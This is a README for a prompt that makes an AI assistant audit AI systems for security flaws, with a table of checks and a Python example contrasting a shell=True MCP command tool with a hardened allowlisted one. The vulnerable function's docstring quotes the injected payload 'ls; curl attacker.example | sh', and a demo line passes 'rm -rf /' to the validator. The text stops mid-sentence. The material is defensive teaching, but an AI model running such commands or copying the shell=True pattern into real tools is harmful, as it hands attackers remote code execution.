hamzashahbaz/ai-security-skill
A prompt-based security audit for AI systems. Copy it, paste it into any AI assistant with codebase access, and get a structured vulnerability report in minutes.
Most AI systems ship with zero security review: MCP servers running with unrestricted shell access, API keys hardcoded in config files committed to git, agent prompts with no injection defenses. The AI ecosystem is moving fast, but security tooling hasn't caught up, and most teams don't even know what to check.
A comprehensive security audit prompt. Not a CLI tool. Not a SaaS product. Just a well-structured prompt that turns any AI assistant (Claude, GPT, Gemini, or anything with codebase access) into a security auditor.
You give it access to your project, it systematically reads your files, and it produces a detailed report with specific findings, evidence, and remediation steps.
The audit covers 8 categories across ~30 individual checks:
| Category | What It Looks For |
|----------|-------------------|
| MCP Server Security | Transport security, tool exposure, input validation, secret handling, trust boundaries |
| Agent & Prompt Security | Prompt injection resistance, system prompt leakage, agent boundary enforcement, instruction hierarchy |
| Secret & Credential Management | Hardcoded secrets, env variable hygiene, secret scope, logging exposure |
| Data Flow & Privacy | Data sent to LLM providers, retention policies, output validation, context window risks |
| LLM API Configuration | Rate limiting, cost controls, model access restrictions, error handling |
| Permission & Access Control | File system access, network access, destructive operations, least privilege |
| Supply Chain & Dependencies | Third-party MCP servers, dependency vulnerabilities, model supply chain |
| Output Security | Code execution risks, injection attacks, file write safety |
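To make the MCP Server Security, Permission & Access Control and Output Security rows concrete, here is the single most common finding these checks turn up, shown beside the shape the auditor would expect instead. This is an added example written for this README, not code from the ai-security-skill repository or from any MCP server; the `ALLOWED_COMMANDS` policy, `SANDBOX_DIR`, the size and time limits and all function names are assumptions made for illustration.

```python
"""Vulnerable and hardened MCP-style command tools, side by side.

Constructed example for this README, not code from the ai-security-skill
repository. `run_shell_vulnerable` is the pattern the MCP Server Security,
Permission & Access Control and Output Security checks are meant to catch;
`run_command_hardened` shows the controls an auditor would expect instead.
"""
import subprocess
import tempfile

# Hypothetical policy for the example: allowed executable -> maximum argument count.
ALLOWED_COMMANDS = {"echo": 8, "ls": 4, "git": 6}
SANDBOX_DIR = tempfile.gettempdir()   # assumed working directory for tool runs
MAX_OUTPUT_BYTES = 4096               # cap on what flows back into the model context
TIMEOUT_SECONDS = 5


def run_shell_vulnerable(command: str) -> str:
    """INSECURE 'before' pattern: model-controlled text reaches /bin/sh unchanged.

    An injected instruction such as `ls; curl attacker.example | sh` is executed
    exactly as written. Kept only to show what the audit flags.
    """
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


class ToolInputError(ValueError):
    """Raised when a tool call fails validation; no process is spawned."""


def validate_tool_call(command: str, args: list) -> list:
    """Check a structured tool call against the policy and return the argv to run.

    All checks happen before any process is spawned, so a rejected call is a
    clean error the agent can report rather than a partial execution.
    """
    if not isinstance(command, str) or command not in ALLOWED_COMMANDS:
        raise ToolInputError(f"command not in allowlist: {command!r}")
    if not isinstance(args, list) or not all(isinstance(a, str) for a in args):
        raise ToolInputError("args must be a list of strings")
    if len(args) > ALLOWED_COMMANDS[command]:
        raise ToolInputError(f"too many arguments for {command}")
    for arg in args:
        # Path-like arguments must stay below the sandbox directory.
        if arg.startswith("/") or ".." in arg:
            raise ToolInputError(f"argument escapes sandbox: {arg!r}")
        # Control characters have no legitimate use here and can corrupt logs.
        if any(ord(ch) < 32 for ch in arg):
            raise ToolInputError("control characters not allowed in arguments")
    return [command, *args]


def tool_call_is_accepted(command, args) -> bool:
    """Convenience wrapper: does the policy accept this call? Nothing is executed."""
    try:
        validate_tool_call(command, args)
        return True
    except ToolInputError:
        return False


def run_command_hardened(command: str, args: list) -> str:
    """Execute an allowlisted command as an argv array.

    With shell=False the argument list goes straight to exec, so `;`, `|`,
    `$(...)` and friends are ordinary bytes inside an argument, not operators.
    """
    argv = validate_tool_call(command, args)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True,
                          timeout=TIMEOUT_SECONDS, cwd=SANDBOX_DIR)
    return proc.stdout[:MAX_OUTPUT_BYTES]


if __name__ == "__main__":
    print(run_shell_vulnerable("echo injected; echo second"))       # both commands run
    print(run_command_hardened("echo", ["injected; echo second"]))  # one echo, literal text
    print(tool_call_is_accepted("rm", ["-rf", "/"]))                # False: not allowlisted
```

When reviewing a real MCP server against the table above, the questions map directly onto this code: is there a `shell=True` (or equivalent) anywhere a model-supplied string can reach; is the set of executables closed or open-ended; are arguments validated before the spawn rather than after; is there a timeout and an output cap; and is the working directory pinned rather than inherited from wherever the server happened to start.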
Every finding includes a risk level (Critical / H